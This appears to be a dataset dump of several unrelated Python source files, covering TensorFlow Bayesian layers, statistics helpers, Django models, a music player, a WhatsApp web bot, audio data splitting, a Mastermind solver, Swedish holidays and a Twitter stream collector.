# original coefficient from paper is above
coeff = eta / (1.0 + tf.sqrt(eta))
R = (tf.sqrt(D_inv) - coeff * tf.matmul
(tf.matmul(tf.matmul(D_inv, u), tf.transpose(u)),
tf.sqrt(D_inv)))
return Tr_C, ld_C, R
(self.batch_Tr_C, self.batch_ld_C, self.batch_R) = tf.scan(
get_cov, [self.batch_u, self.batch_unc_d],
initializer=(0.0, tf.zeros([1, 1]), tf.diag(self.batch_unc_d[0])))
self.batch_xi = (self.batch_mu +
(tf.squeeze(tf.matmul(self.batch_R,
(tf.expand_dims(tf.random_normal(
[tf.shape(self.batch_R)[0],
self.num_units]), -1))))))
def call(self, inputs, add_noise=False, use_rec_model=False):
activation = tf.matmul(self.nonlinearity(inputs), self.W) + self.b
if use_rec_model:
# use sample from rec model
xi = self.batch_xi
if add_noise: # additional noise
xi += (self.extra_noise * tf.random_normal
(tf.shape(self.batch_xi)))
else:
# pure random input
xi = tf.random_normal((tf.shape(inputs)[0], self.num_units))
# we want the mean when training, so don't add noise to
# output of last layer when training.
if not self.output_layer:
activation += tf.matmul(xi, self.G)
elif not add_noise:
activation += tf.matmul(xi, self.G)
return activation
def get_ELBO(self, length):
"""
Get ELBO for this layer
length (theano symbolic int): length of current batch
"""
# KL divergence between posterior and N(0,1) prior
KL_div = (0.5 * (tf.reduce_sum(tf.sqrt(tf.reduce_sum(self.batch_mu**2,
axis=1))) + tf.reduce_sum(self.batch_Tr_C) -
tf.reduce_sum(self.batch_ld_C) - length))
weight_reg = ((0.5 / self.k) *
tf.sqrt(tf.reduce_sum(self.W**2)) *
tf.sqrt(tf.reduce_sum(self.G**2)))
return -(weight_reg + KL_div)
def compute_output_shape(self, input_shape):
return (input_shape[0], self.num_units)
class PKBiasLayer(keras_layers.Layer):
"""
This layer draws different biases (depending on the mode)
from a normal distribution, then adds them to the input
Default modes are as follows:
0: normal, no biases added
1: saline and DLPFC, bias 0 is added
2: saline and DMPFC, bias 1 is added
3: muscimol and DLPFC, biases 0 and 2 are added
4: muscimol and DMPFC, biases 1 and 3 are added
"""
def __init__(self, incoming, params,
param_init=tf.random_normal_initializer(stddev=0.01),
num_biases=4, **kwargs):
super(PKBiasLayer, self).__init__(**kwargs)
num_inputs = incoming.output_shape[1]
self.mode = tf.zeros(num_biases)
self.k = np.cast[backend.floatx()](params['k'])
self.m = self.add_variable(name='m', shape=[num_biases, num_inputs],
initializer=param_init)
self.log_s = self.add_variable(name='log_s',
shape=[num_biases, num_inputs],
initializer=param_init)
# standard deviation will always be positive but optimization over
# log_s can be unconstrained
self.s = tf.exp(self.log_s)
self.draw_biases()
self.draw_on_every_output = True
def build(self, incoming):
if self.draw_on_every_output:
self.draw_biases()
super(PKBiasLayer, self).build(incoming)
def draw_biases(self):
self.biases = self.m + tf.random_normal(shape=self.s.shape,
seed=1234) * self.s
def call(self, inputs):
act_biases = tf.matmul(tf.reshape(tf.cast(
self.mode, backend.floatx()), [1, -1]), self.biases)
return inputs + act_biases
def set_mode(self, mode):
self.mode = mode
def get_ELBO(self, nbatches):
"""
Return the contribution to the ELBO for these biases
Normalized by nbatches (number of batches in dataset)
"""
ELBO = (tf.reduce_sum(-tf.abs(self.biases) / self.k -
tf.log(tf.constant(2.0) * self.k)))
ELBO += tf.reduce_sum(tf.log(self.s))
return ELBO / nbatches
class PKRowBiasLayer(keras_layers.Layer):
"""
This layer draws different biases (depending on the mode)
from a normal distribution, then adds them to the input.
This layer has sparsity at the row level, instead of the individual
sparsity of the PKBiasLayer.
Default modes are as follows:
0: normal, no biases added
1: saline and DLPFC, bias 0 is added
2: saline and DMPFC, bias 1 is added
3: muscimol and DLPFC, biases 0 and 2 are added
4: muscimol and DMPFC, biases 1 and 3 are added
"""
def __init__(self, incoming, params,
param_init=tf.random_normal_initializer(stddev=0.01),
num_biases=4, **kwargs):
super(PKRowBiasLayer, self).__init__(**kwargs)
num_inputs = incoming.output_shape[1]
self.mode = tf.zeros(num_biases)
# parameters on prior
self.a = np.cast[backend.floatx()](params['a']) # shape
self.b = np.cast[backend.floatx()](params['b']) # rate
# learnable posterior parameters
# normal dist over biases
self.mu = self.add_variable(name='mu', shape=[num_biases, num_inputs],
initializer=param_init)
self.unc_sig = self.add_variable(name='unc_sig',
shape=[num_biases, num_inputs],
initializer=param_init)
# gamma over rows
self.alpha = tf.Variable(initial_value=self.a * np.ones(
(num_biases, 1)), name='alpha', dtype=tf.float32)
self.beta = tf.Variable(initial_value=self.b * np.ones(
(num_biases, 1)), name='beta', dtype=tf.float32)
# update for alpha
self.alpha += (num_inputs / 2.0)
# standard deviation will always be positive but optimization over
# unc_sig can be unconstrained
self.sigma = tf.nn.softplus(self.unc_sig)
self.draw_biases()
self.draw_on_every_output = True
def build(self, incoming):
if self.draw_on_every_output:
self.draw_biases()
super(PKRowBiasLayer, self).build(incoming)
def draw_biases(self):
self.gamma = self.mu + tf.random_normal(
shape=self.sigma.shape, seed=1234) * self.sigma
def call(self, input):
act_biases = tf.matmul(tf.reshape(tf.cast(
self.mode, backend.floatx()), [1, -1]), self.gamma)
return input + act_biases
def set_mode(self, mode):
self.mode = mode
def coord_update(self):
self.beta = self.b + 0.5 * tf.reduce_sum(self.mu**2 + self.sigma**2,
axis=1,
keep_dims=True)
def get_ELBO(self, nbatches):
"""
Return the contribution to the ELBO for these biases
Normalized by nbatches (number of batches in dataset)
"""
self.coord_update()
# Log Density
ELBO = (tf.reduce_sum(-0.5 * (self.mu**2 + self.sigma**2) *
(self.alpha / self.beta) + 0.5 * (tf.digamma(self.alpha) -
tf.log(self.beta)) - 0.5 * tf.log(2 * np.pi)))
ELBO += (tf.reduce_sum((self.a - 1) * (tf.digamma(self.alpha) -
tf.log(self.beta)) - self.b * (self.alpha / self.beta) +
self.a * tf.log(self.b) - tf.lgamma(self.a)))
# entropy
ELBO += (tf.reduce_sum(0.5 * tf.log(2 * np.pi) + 0.5 +
tf.log(self.sigma)))
ELBO += (tf.reduce_sum(self.alpha - tf.log(self.beta) +
tf.lgamma(self.alpha) + (1 - self.alpha) *
tf.digamma(self.alpha)))
return ELBO / nbatches
| 1.898438
| 2
|
vendor/mo_math/stats.py
|
klahnakoski/auth0-api
| 0
|
12784794
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: <NAME> (<EMAIL>)
#
from __future__ import absolute_import, division, unicode_literals
import math
import sys
from math import sqrt
from mo_dots import Data, Null, coalesce
from mo_future import text
from mo_logs import Log
from mo_math import OR, almost_equal
from mo_math.vendor import strangman
DEBUG = True
DEBUG_STRANGMAN = False
EPSILON = 0.000000001
ABS_EPSILON = sys.float_info.min * 2 # *2 FOR SAFETY
if DEBUG_STRANGMAN:
try:
import numpy as np
from scipy import stats
import scipy
except Exception as e:
DEBUG_STRANGMAN = False
def chisquare(f_obs, f_exp):
try:
py_result = strangman.stats.chisquare(f_obs, f_exp)
except Exception as e:
Log.error("problem with call", e)
if DEBUG_STRANGMAN:
from mo_testing.fuzzytestcase import assertAlmostEqualValue
sp_result = scipy.stats.chisquare(np.array(f_obs), f_exp=np.array(f_exp))
if not assertAlmostEqualValue(
sp_result[0], py_result[0], digits=9
) and assertAlmostEqualValue(sp_result[1], py_result[1], delta=1e-8):
Log.error("problem with stats lib")
return py_result
def Stats2ZeroMoment(stats):
# MODIFIED FROM http://statsmodels.sourceforge.net/devel/_modules/statsmodels/stats/moment_helpers.html
# ADDED count
mc0, mc1, mc2, skew, kurt = (
stats.count,
coalesce(stats.mean, 0),
coalesce(stats.variance, 0),
coalesce(stats.skew, 0),
coalesce(stats.kurtosis, 0),
)
mz0 = mc0
mz1 = mc1 * mc0
mz2 = (mc2 + mc1 * mc1) * mc0
mc3 = coalesce(skew, 0) * (mc2 ** 1.5) # 3rd central moment
mz3 = (mc3 + 3 * mc1 * mc2 + mc1 ** 3) * mc0 # 3rd non-central moment
mc4 = (coalesce(kurt, 0) + 3.0) * (mc2 ** 2.0) # 4th central moment
mz4 = (mc4 + 4 * mc1 * mc3 + 6 * mc1 * mc1 * mc2 + mc1 ** 4) * mc0
m = ZeroMoment(mz0, mz1, mz2, mz3, mz4)
if DEBUG:
from mo_testing.fuzzytestcase import assertAlmostEqualValue
globals()["DEBUG"] = False
try:
v = ZeroMoment2Stats(m)
assertAlmostEqualValue(v.count, stats.count, places=10)
assertAlmostEqualValue(v.mean, stats.mean, places=10)
assertAlmostEqualValue(v.variance, stats.variance, places=10)
assertAlmostEqualValue(v.skew, stats.skew, places=10)
assertAlmostEqualValue(v.kurtosis, stats.kurtosis, places=10)
except Exception as e:
v = ZeroMoment2Stats(m)
Log.error("programmer error")
globals()["DEBUG"] = True
return m
def ZeroMoment2Stats(z_moment):
Z = z_moment.S
N = Z[0]
if N == 0:
return Stats()
mean = Z[1] / N
Z2 = Z[2] / N
Z3 = Z[3] / N
Z4 = Z[4] / N
if N == 1:
variance = None
skew = None
kurtosis = None
else:
if almost_equal(Z2, mean * mean, digits=9):
variance = 0
skew = None
kurtosis = None
else:
variance = Z2 - mean * mean
mc3 = Z3 - (3 * mean * variance + mean ** 3) # 3rd central moment
mc4 = Z4 - (4 * mean * mc3 + 6 * mean * mean * variance + mean ** 4)
skew = mc3 / (variance ** 1.5)
kurtosis = (mc4 / (variance ** 2.0)) - 3.0
stats = Stats(count=N, mean=mean, variance=variance, skew=skew, kurtosis=kurtosis)
if DEBUG:
from mo_testing.fuzzytestcase import assertAlmostEqualValue
globals()["DEBUG"] = False
v = Null
try:
v = Stats2ZeroMoment(stats)
for i in range(5):
assertAlmostEqualValue(v.S[i], Z[i], places=7)
except Exception as e:
Log.error(
"Conversion failed. Programmer error:\nfrom={{from|indent}},\nresult stats={{stats|indent}},\nexpected param={{expected|indent}}",
{"from": Z},
stats=stats,
expected=v.S,
cause=e,
)
globals()["DEBUG"] = True
return stats
class Stats(Data):
def __init__(self, **kwargs):
Data.__init__(self)
self.count = 0
self.mean = None
self.variance = None
self.skew = None
self.kurtosis = None
if "samples" in kwargs:
s = ZeroMoment2Stats(ZeroMoment.new_instance(kwargs["samples"]))
self.count = s.count
self.mean = s.mean
self.variance = s.variance
self.skew = s.skew
self.kurtosis = s.kurtosis
return
if "count" not in kwargs:
self.count = 0
self.mean = None
self.variance = None
self.skew = None
self.kurtosis = None
elif "mean" not in kwargs:
self.count = kwargs["count"]
self.mean = None
self.variance = None
self.skew = None
self.kurtosis = None
elif "variance" not in kwargs and "std" not in kwargs:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = 0
self.skew = None
self.kurtosis = None
elif "skew" not in kwargs:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = (
kwargs["variance"] if "variance" in kwargs else kwargs["std"] ** 2
)
self.skew = None
self.kurtosis = None
elif "kurtosis" not in kwargs:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = (
kwargs["variance"] if "variance" in kwargs else kwargs["std"] ** 2
)
self.skew = kwargs["skew"]
self.kurtosis = None
else:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = (
kwargs["variance"] if "variance" in kwargs else kwargs["std"] ** 2
)
self.skew = kwargs["skew"]
self.kurtosis = kwargs["kurtosis"]
@property
def std(self):
return sqrt(self.variance)
class ZeroMoment(object):
"""
ZERO-CENTERED MOMENTS
"""
def __init__(self, *args):
self.S = tuple(args)
def __add__(self, other):
if isinstance(other, ZeroMoment):
return ZeroMoment(*map(add, self.S, other.S))
elif hasattr(other, "__iter__"):
return ZeroMoment(*map(add, self.S, ZeroMoment.new_instance(other)))
elif other == None:
return self
else:
return ZeroMoment(
*map(
add,
self.S,
(
1,
other,
pow(other, 2),
pow(other, 3),
pow(other, 4),
pow(other, 2),
),
)
)
def __sub__(self, other):
if isinstance(other, ZeroMoment):
return ZeroMoment(*map(sub, self.S, other.S))
elif hasattr(other, "__iter__"):
return ZeroMoment(*map(sub, self.S, ZeroMoment.new_instance(other)))
elif other == None:
return self
else:
return ZeroMoment(
*map(
sub, self.S, (1, other, pow(other, 2), pow(other, 3), pow(other, 4))
)
)
@property
def tuple(self):
# RETURN AS ORDERED TUPLE
return self.S
@property
def dict(self):
# RETURN HASH OF SUMS
return {"s" + text(i): m for i, m in enumerate(self.S)}
@staticmethod
def new_instance(values=None):
if values == None:
return ZeroMoment()
vals = [v for v in values if v != None]
return ZeroMoment(
len(vals),
sum(vals),
sum([pow(n, 2) for n in vals]),
sum([pow(n, 3) for n in vals]),
sum([pow(n, 4) for n in vals]),
)
@property
def stats(self, *args, **kwargs):
return ZeroMoment2Stats(self, *args, **kwargs)
def add(a, b):
return coalesce(a, 0) + coalesce(b, 0)
def sub(a, b):
return coalesce(a, 0) - coalesce(b, 0)
def ZeroMoment2dict(z):
# RETURN HASH OF SUMS
return {"s" + text(i): m for i, m in enumerate(z.S)}
def median(values, simple=True, mean_weight=0.0):
"""
RETURN MEDIAN VALUE
IF simple=False THEN IN THE EVENT MULTIPLE INSTANCES OF THE
MEDIAN VALUE, THE MEDIAN IS INTERPOLATED BASED ON ITS POSITION
IN THE MEDIAN RANGE
mean_weight IS TO PICK A MEDIAN VALUE IN THE ODD CASE THAT IS
CLOSER TO THE MEAN (PICK A MEDIAN BETWEEN TWO MODES IN BIMODAL CASE)
"""
if OR(v == None for v in values):
Log.error("median is not ready to handle None")
try:
if not values:
return Null
l = len(values)
_sorted = sorted(values)
middle = int(l / 2)
_median = float(_sorted[middle])
if len(_sorted) == 1:
return _median
if simple:
if l % 2 == 0:
return (_sorted[middle - 1] + _median) / 2
return _median
# FIND RANGE OF THE median
start_index = middle - 1
while start_index > 0 and _sorted[start_index] == _median:
start_index -= 1
start_index += 1
stop_index = middle + 1
while stop_index < l and _sorted[stop_index] == _median:
stop_index += 1
num_middle = stop_index - start_index
if l % 2 == 0:
if num_middle == 1:
return (_sorted[middle - 1] + _median) / 2
else:
return (_median - 0.5) + (middle - start_index) / num_middle
else:
if num_middle == 1:
return (1 - mean_weight) * _median + mean_weight * (
_sorted[middle - 1] + _sorted[middle + 1]
) / 2
else:
return (_median - 0.5) + (middle + 0.5 - start_index) / num_middle
except Exception as e:
Log.error("problem with median of {{values}}", values=values, cause=e)
def percentile(values, percent):
"""
PERCENTILE WITH INTERPOLATION
RETURN VALUE AT, OR ABOVE, percentile OF THE VALUES
snagged from http://code.activestate.com/recipes/511478-finding-the-percentile-of-the-values/
"""
N = sorted(values)
if not N:
return None
k = (len(N) - 1) * percent
f = int(math.floor(k))
c = int(math.ceil(k))
if f == c:
return N[int(k)]
d0 = N[f] * (c - k)
d1 = N[c] * (k - f)
return d0 + d1
zero = Stats()
| 1.984375
| 2
|
et_micc2/static_vars.py
|
etijskens/et-micc2
| 0
|
12784795
|
# -*- coding: utf-8 -*-
"""
Module et_micc2.static_vars
===========================
A decorator for adding static variables to a function.
see https://stackoverflow.com/questions/279561/what-is-the-python-equivalent-of-static-variables-inside-a-function
"""
def static_vars(**kwargs):
"""Add static variables to a method.
To add the variable :py:obj:`counter` to :py:meth:`foo` :
.. code-block:: python
@static_vars(counter=0)
def foo():
foo.counter += 1 # foo.counter is incremented on every call to foo
"""
def decorate(func):
for k in kwargs:
setattr(func, k, kwargs[k])
return func
return decorate
#eof
| 3.609375
| 4
|
django_project/polls/models.py
|
Jeffhabs/cs2450
| 0
|
12784796
|
<filename>django_project/polls/models.py
import uuid
from django.db import models
from django.contrib.auth.models import User
class Question(models.Model):
user = models.ForeignKey(User)
question_text = models.CharField(max_length=128)
pub_date = models.DateTimeField(auto_now_add=True)
private = models.BooleanField(default=False)
active = models.BooleanField(default=False)
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
@property
def get_uuid(self):
return unicode(self.uuid)
def __unicode__(self, *args, **kwargs):
return self.question_text
class Choice(models.Model):
question = models.ForeignKey(Question)
choice_text = models.CharField(max_length=128)
votes = models.PositiveIntegerField(default=0)
def __unicode__(self, *args, **kwargs):
return self.question.question_text + " - " + self.choice_text
| 2.5
| 2
|
src/music_crawler.py
|
AlexanderTankov/Music-player
| 0
|
12784797
|
<gh_stars>0
from mutagen.mp3 import MP3
import pygame
from song import Song
from playlist import Playlist
import os
NUM = 0
PATH_TO_MUSIC_LIB = "/home/alexandar/Documents/Programming-101/Week2/Music Library"
class MusicCrawler():
def __init__(self, path):
self.path = path
def generate_playlist(self):
result = Playlist("Rock'n'roll")
music_files = [f for f in os.listdir(self.path) if f.endswith('.mp3') or f.endswith('.MP3')]
for song in music_files:
audio = MP3(self.path + "/" + song)
my_new_song = Song(audio["TIT2"],
audio["TPE1"],
audio["TALB"],
0,
int(audio.info.length),
audio.info.bitrate
)
result.add_song(my_new_song)
return result
def start_playlist(array_of_songs, num):
pygame.mixer.init()
pygame.mixer.music.load(array_of_songs[num - 1])
pygame.mixer.music.play()
def stop():
pygame.mixer.music.stop()
def startProgramNoRepeat():
global NUM
NUM += 1
crawler = MusicCrawler(PATH_TO_MUSIC_LIB)
playlist = crawler.generate_playlist()
songs_arr = []
for elem in playlist.songs:
songs_arr.append("{} - {}.mp3".format(elem.artist, elem.title))
if NUM > len(songs_arr):
NUM = len(songs_arr)
start_playlist(songs_arr, NUM)
def startProgram():
print("startProgram")
global NUM
NUM += 1
crawler = MusicCrawler(PATH_TO_MUSIC_LIB)
playlist = crawler.generate_playlist()
songs_arr = []
for elem in playlist.songs:
songs_arr.append("{} - {}.mp3".format(elem.artist, elem.title))
print("Playlist:")
for idx, elem in enumerate(songs_arr):
print("[{}] {}".format(idx + 1, elem))
if NUM > len(songs_arr):
NUM = 1
start_playlist(songs_arr, NUM)
| 3.078125
| 3
|
data/datasplit.py
|
hktxt/CBI
| 1
|
12784798
|
# organize data, read wav to get duration and split train/test
# to a csv file
# author: Max, 2020.08.05
import os
import librosa
from tqdm import tqdm
import pandas as pd
from sklearn.model_selection import StratifiedKFold
def main(root_pth):
if not os.path.exists('df.csv'):
data = []
folds = os.listdir(root_pth)
for idx, fold in enumerate(tqdm(folds)):
wavs = os.listdir(os.path.join(root_pth, fold))
for wav in wavs:
wav_pth = os.path.join(root_pth, fold, wav)
duration = librosa.get_duration(filename=wav_pth)
target = {
'file': wav,
'bird': fold,
'label': idx,
'duration': duration
}
data.append(target)
# if idx == 1:
# break
df = pd.DataFrame(data, columns=['label', 'bird', 'file', 'duration'])
df.to_csv('df.csv', index=False)
df = pd.read_csv('df.csv')
df['fold'] = -1
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
for fold_number, (train_index, val_index) in enumerate(skf.split(X=df.index, y=df['label'])):
df.loc[df.iloc[val_index].index, 'fold'] = fold_number
df.to_csv('df.csv', index=False)
if __name__ == "__main__":
# main('./data/birdsong-recognition/train_audio/')
# https://www.kaggle.com/ttahara/training-birdsong-baseline-resnest50-fast#split-data
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
train_all = pd.read_csv('train_mod.csv')
train_all = train_all.drop(train_all[train_all["resampled_filename"] == 'XC195038.wav'].index)
train_all = train_all.reset_index()
train_all["fold"] = -1
for fold_id, (train_index, val_index) in enumerate(skf.split(train_all, train_all["ebird_code"])):
train_all.iloc[val_index, -1] = fold_id
# # check the propotion
fold_proportion = pd.pivot_table(train_all, index="ebird_code", columns="fold", values="xc_id", aggfunc=len)
print(fold_proportion.shape)
train_all.to_csv('df_mod.csv', index=False)
| 2.984375
| 3
|
pictures/models.py
|
Waithera-m/collage_life
| 0
|
12784799
|
from django.db import models
# Create your models here.
class Location(models.Model):
"""
class facilitates the creation of location objects
"""
location_name = models.CharField(max_length=70)
def __str__(self):
return self.location_name
def save_location(self):
"""
method saves entered location in database
"""
self.save()
def update_location(self, using=None, fields=None, **kwargs):
"""
method updates saved location
"""
if fields is not None:
fields = set(fields)
deferred_fields = self.get_deferred_fields()
if fields.intersection(deferred_fields):
fields = fields.union(deferred_fields)
super().refresh_from_db(using, fields, **kwargs)
def delete_location(self):
"""
method deletes location
"""
self.delete()
class Category(models.Model):
"""
class facilitates the creation of category objects
"""
category_name = models.CharField(max_length=70)
def __str__(self):
return self.category_name
def save_category(self):
"""
method saves added category
"""
self.save()
def update_category(self, using=None, fields=None, **kwargs):
"""
method updates saved category
"""
if fields is not None:
fields = set(fields)
deferred_fields = self.get_deferred_fields()
if fields.intersection(deferred_fields):
fields = fields.union(deferred_fields)
super().refresh_from_db(using, fields, **kwargs)
def delete_category(self):
"""
method deletes saved category
"""
self.delete()
class Image(models.Model):
"""
class facilitates the creation of image objects
"""
image_name = models.CharField(max_length=70)
image_description = models.TextField(max_length=200)
location = models.ForeignKey(Location, on_delete=models.CASCADE)
category = models.ManyToManyField(Category)
pub_date = models.DateField('date published', null=True)
owner = models.CharField(max_length=70, null=True)
image = models.ImageField(upload_to='images/%Y/%m/%d', null=True)
def __str__(self):
return self.image_name
def save_image(self):
"""
method saves added image
"""
self.save()
def update_image(self, using=None, fields=None, **kwargs):
"""
method updates saved category
"""
if fields is not None:
fields = set(fields)
deferred_fields = self.get_deferred_fields()
if fields.intersection(deferred_fields):
fields = fields.union(deferred_fields)
super().refresh_from_db(using, fields, **kwargs)
def delete_image(self):
"""
method deletes saved image
"""
self.delete()
@classmethod
def get_image_by_id(cls, image_id):
"""
method returns image with a particular id
"""
try:
single_image = cls.objects.filter(pk=image_id)
except Image.DoesNotExist:
pass
return single_image
@classmethod
def filter_images_by_location(cls, location_id):
"""
method returns images in a given category
"""
try:
images = cls.objects.filter(location__pk=location_id)
except Image.DoesNotExist:
pass
return images
@classmethod
def search_images_by_category(cls, category_id):
"""
method returns images associated with a particular category
"""
try:
images = cls.objects.filter(category__pk=category_id)
except Image.DoesNotExist:
pass
return images
@classmethod
def search_term_category(cls, search_term):
"""
method returns category specific images
"""
images = cls.objects.filter(category__category_name__icontains=search_term)
return images
| 2.84375
| 3
|
pybot/whatsapp/feature/WelcomePageFeature.py
|
iren86/whatsapp-pybot
| 4
|
12784800
|
<reponame>iren86/whatsapp-pybot<filename>pybot/whatsapp/feature/WelcomePageFeature.py
# -*- coding: utf-8 -*-
from functools import partial
from selenium.webdriver.common.by import By
from pybot.whatsapp.feature.BaseFeature import BaseFeature
from pybot.whatsapp.util import WaitUtil
WAIT_FOR_QR_CODE_TIMEOUT_IN_SEC = 600
class WelcomePageFeature(BaseFeature):
SCAN_IMAGE = (
By.XPATH,
'//img[contains(@alt, "Scan me")]'
)
def open_welcome_page(self):
self.driver.get("https://web.whatsapp.com/")
def wait_for_phone_scan_complete(self):
WaitUtil.wait_for_result_is_false(partial(self.is_element_exists, WelcomePageFeature.SCAN_IMAGE),
WAIT_FOR_QR_CODE_TIMEOUT_IN_SEC,
"!!! Scan the QR code that appears on the Chrome browser screen with WhatsApp app on your phone. Waiting ....")
self.random_sleep_between_requests()
| 2.828125
| 3
|
excel_text/__init__.py
|
AutoActuary/excel-text
| 0
|
12784801
|
from excel_text.factory import get_text_function
text = get_text_function({"decimal": ".", "thousands": ",", "raise": True})
| 2.03125
| 2
|
lib/python/mastermind/algorithms/simple.py
|
JBierenbroodspot/mastermind
| 1
|
12784802
|
<gh_stars>1-10
# ----------------------------------------------------------------------------------------------------------------------
# SPDX-License-Identifier: BSD 3-Clause -
# Copyright (c) 2022 <NAME>. -
# ----------------------------------------------------------------------------------------------------------------------
"""
Mastermind solving algorithm using <NAME>'s and <NAME>'s simple algorithm.
This code is developed using code found in the following book:
<NAME>., & <NAME>. (1994). The art of Prolog: advanced programming techniques (2nd ed.). MIT Press.
"""
from __future__ import annotations
import typing
import lib.python.mastermind.mastermind as game
import initialization as init
def main() -> None:
game_simulation: typing.Generator[typing.Tuple[int, int, bool], game.Code, None]
guess: game.Code
answer: typing.Tuple[int, int, bool]
game_round: int = 0
possible_combinations: init.Json = init.get_combinations()
game_simulation = game.simulate_game(init.COLOURS, init.GAME_LENGTH, init.GAME_WIDTH)
for _ in game_simulation:
game_round += 1
guess = possible_combinations[0]
answer = game_simulation.send(guess)
print(f"Guessed: {guess}; answer: {answer}")
# Check if the game is won
if answer[2]:
print(f'Game won in {game_round + 1} guesses!')
break
possible_combinations = init.reduce(possible_combinations, guess, answer[:2])
else:
print('Game lost.')
if __name__ == "__main__":
main()
| 3.78125
| 4
|
iceworm/tests/plugins/env.py
|
wrmsr0/iceworm
| 0
|
12784803
|
import os
import typing as ta
from omnibus import lang
from ._registry import register
@lang.cached_nullary
def _load_dot_env() -> ta.Optional[ta.Mapping[str, str]]:
fp = os.path.join(os.path.dirname(os.path.dirname(__file__)), '../../.env')
if not os.path.isfile(fp):
return None
with open(fp, 'r') as f:
buf = f.read()
ret = {}
for line in buf.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
k, _, v = line.partition('=')
k = k.strip()
v = v.strip()
ret[k] = v
os.environ[k] = v
return ret
@register
class EnvPlugin:
def pytest_addoption(self, parser):
parser.addoption('--no-dotenv', action='store_true', help='Disables dotenv')
def pytest_configure(self, config):
if not config.option.no_dotenv:
_load_dot_env()
| 1.976563
| 2
|
client_linux/helpers/aesthetics.py
|
carlosgprado/BrundleFuzz
| 90
|
12784804
|
##################################################################
# Aesthetics.py
# It is not only pretty but legible too
##################################################################
try:
import colorama
from colorama import Fore, Back, Style
COLORAMA = True
except ImportError:
print "[!] COLORAMA not found"
print "Defaulting to boring text..."
COLORAMA = False
class Aesthetics(object):
def __init__(self, parent):
"""
NOTE: This could be implemented
as decorators...
"""
self.parent = parent
if COLORAMA:
colorama.init(autoreset = True)
def m_info(self, m):
m = '[*] ' + m
if COLORAMA:
print Style.DIM + m
else:
print m
def m_warn(self, m):
m = '[!] ' + m
if COLORAMA:
print Fore.YELLOW + m
else:
print m
def m_ok(self, m):
m = '[OK] ' + m
if COLORAMA:
print Fore.GREEN + m
else:
print m
def m_alert(self, m):
m = '[!!] ' + m
if COLORAMA:
print Fore.RED + m
else:
print m
def m_fatal(self, m):
m = '[X] ' + m
if COLORAMA:
print Fore.WHITE + Back.RED + m
else:
print m
def stop(self):
self.m_info("Restoring terminal...")
colorama.deinit()
| 2.71875
| 3
|
holidata/holidays/sv-SE.py
|
vice/holidata
| 0
|
12784805
|
# coding=utf-8
from dateutil.easter import EASTER_WESTERN
from holidata.utils import SmartDayArrow
from .holidays import Locale, Holiday
"""
source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/lag-1989253-om-allmanna-helgdagar_sfs-1989-253
source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/semesterlag-1977480_sfs-1977-480
"""
class sv_SE(Locale):
"""
01-01: [NF] Nyårsdagen
01-06: [NRF] Trettondedag jul
05-01: [NF] Första maj
06-06: [NF] Nationaldagen
12-24: [NRF] Julafton
12-25: [NRF] Juldagen
12-26: [NRF] Annandag jul
12-31: [NF] Nyårsafton
2 days before Easter: [NRV] Långfredagen
Easter: [NRV] Påskdagen
1 day after Easter: [NRV] Annandag påsk
39 days after Easter: [NRV] Kristi himmelsfärdsdag
49 days after Easter: [NRV] Pingstdagen
"""
locale = "sv-SE"
easter_type = EASTER_WESTERN
def __midsommar(self):
"""
Find the Saturday between 20 and 26 June
"""
return SmartDayArrow(self.year, 6, 19).shift_to_weekday('saturday', order=1, reverse=False)
def holiday_midsommarafton(self):
"""
The day before midsommardagen: [NV] Midsommarafton
"""
return [Holiday(
self.locale,
"",
self.__midsommar().shift(days=-1),
"Midsommarafton",
"NV"
)]
def holiday_midsommardagen(self):
"""
Saturday between 20 and 26 June: [NV] Midsommardagen
"""
return [Holiday(
self.locale,
"",
self.__midsommar(),
"Midsommardagen",
"NV"
)]
def holiday_alla_helgons_dag(self):
"""
Saturday between 31 October and 6 November: [NRV] Alla helgons dag
"""
return [Holiday(
self.locale,
"",
SmartDayArrow(self.year, 10, 30).shift_to_weekday('saturday', order=1, reverse=False),
"Alla helgons dag",
"NRV"
)]
| 2.8125
| 3
|
barry/samplers/__init__.py
|
AaronGlanville/Barry
| 13
|
12784806
|
from barry.samplers.dynesty_sampler import DynestySampler
from barry.samplers.ensemble import EnsembleSampler
from barry.samplers.metropolisHastings import MetropolisHastings
__all__ = ["EnsembleSampler", "DynestySampler", "MetropolisHastings"]
| 1.0625
| 1
|
twitter_streaming_collecter.py
|
jeanmidevacc/french-presidential-election-2022-data-collecter
| 1
|
12784807
|
import json
from datetime import datetime
import pandas as pd
import argparse
import boto3
import os
import itertools
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from urllib3.exceptions import ProtocolError
class StdOutListener(StreamListener):
def __init__(self, duration):
self.start_date = datetime.utcnow()
self.duration = duration
self.stop = False
self.data = []
def on_data(self, data):
tweet = json.loads(data)
self.data.append(tweet)
if (datetime.utcnow() - self.start_date).total_seconds() > self.duration:
self.stop = True
return False
return True
def on_error(self, status):
if (datetime.utcnow() - self.start_date).total_seconds() > self.duration:
self.stop = True
return False
return True
def set_job():
parser = argparse.ArgumentParser(description='Collect tweets')
parser.add_argument('--duration', type=int, help='Number of seconds before to stop the collecter', default=300)
parser.add_argument('--configuration', type=str, help='Configuration file for the job', default="./configuration.json")
parser.add_argument('--candidates', type=str, help='Configuration file for the job', default="./candidates.json")
args = parser.parse_args()
duration = args.duration
with open(args.configuration) as f:
configuration = json.load(f)
with open(args.candidates) as f:
candidates = json.load(f)
return duration, configuration, candidates
file_extension = ".csv.gz"
if __name__ == '__main__':
duration, configuration, candidates = set_job()
print(datetime.utcnow())
print(f'Will save the tweets for the next {duration} sec')
print(candidates)
filters = [[item["name"]] + item["twitter_account"] for key, item in candidates.items()]
filters = list(itertools.chain.from_iterable(filters))
filters = list(dict.fromkeys(filters))
print("Filters:", filters)
